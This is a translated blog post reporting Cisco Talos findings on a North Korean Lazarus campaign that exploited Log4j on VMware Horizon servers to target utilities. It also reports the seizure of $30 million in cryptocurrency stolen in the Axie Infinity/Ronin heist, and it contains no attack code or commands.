[German]The state sponsored Lazarus hacking group, based in North Korea, has repeatedly attracted attention for ransomware attacks and espionage. Now Cisco Talos has uncovered an attack campaign that targeted utility companies in North America. In addition, US law enforcement has managed to seize $30 million in cryptocurrency from an attack on Axie, where hackers had captured $600 million.
Lazarus attacks via Log4j
Talos, a security firm belonging to Cisco, has managed to track a new campaign by the state-run Lazarus APT group. It is a state-backed hacking group attributed to North Korea by the U.S. government as well as many security firms. I came across the article Lazarus and the tale of three RATs published a few days ago with details via the following tweet.
The campaign, conducted by APT Lazarus Group between February and July 2022, exploited vulnerabilities in VMWare Horizon to gain a foothold in targeted organizations. The original vector was to exploit the Log4j vulnerability on unprotected VMware Horizon servers. After all, I had reported about the vulnerability several times on the blog (see links at the end of the article). If you ask a search engine like Shodan for VMware installations accessible from the Internet, you will see quite a lot of red (see the following figure).
corporate networks, the deployment of the VSingle and YamaBot malware implants developed by the group began. In addition to these known malware families, the security researchers have also discovered the use of a previously unknown malware implant, which they call "MagicRAT".
Lazarus attack chain, source: Talos
This campaign has already been partially uncovered by other security firms, but Cisco Talos can reveal more details about the adversary's modus operandi. In addition, security researchers have identified overlaps in command and control (C2) and payload-hosting infrastructure between their own findings and the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) June 2022 recommendation. The CISA recommendations addressed continued attempts by threat actors to compromise vulnerable VMWare Horizon servers.
The targets include utilities from around the world, including those headquartered in the United States, Canada and Japan. The campaign aims to infiltrate organizations around the world to gain long-term access and subsequently exfiltrate data of interest to the adversary nation-state. Details can be read in the Talos blog post if interested.
$30 million in ransomware seized
One of the goals of the Lazarus APT group is to raise foreign currency for North Korea via digital heists. In March 2022, more than $600 million was stolen from the Ronin Network. The network belongs to the play-to-earn game Axie Infinity. The Lazarus Group is suspected to be behind it.
In the post $30 Million Seized: How the Cryptocurrency Community Is Making It Difficult for North Korean Hackers To Profit, security researchers from Chainanalysis report how they managed to seize some of the looted funds with the help of law enforcement and leading organizations in the cryptocurrency industry. Specifically, more than $30 million worth of cryptocurrencies stolen by hackers with North Korean ties were seized. This is the first time ever that cryptocurrency stolen by a North Korean hacking group has been seized, and security researchers at Chainanalysis are confident that it won't be the last. Details can be read in their article.
0-day CVE-2021-44228 in Java library log4j puts many projects at risk
log4j vulnerability CVE-2021-44228: Patch your Minecraft
VMware products threatened by log4j vulnerability CVE-2021-44228
log4j FAQ and Repository
Belgian Ministry of Defense affected by Log4j?
QNAP firmware update version QTS 188.8.131.521 build 20211221 and log4j vulnerability
Log4j security messages (12/28/2021)
Windows Defender: Fixes, Issues and Log4j scanner false alarms
RCE vulnerability – similar to log4j – discovered in H2 (Java) database system
Attacks on VMWare Horizon servers with log4j vulnerability
Log4J: SMEs not aware of, DHS see problems for a decade
Cookies helps to fund this blog: Cookie settings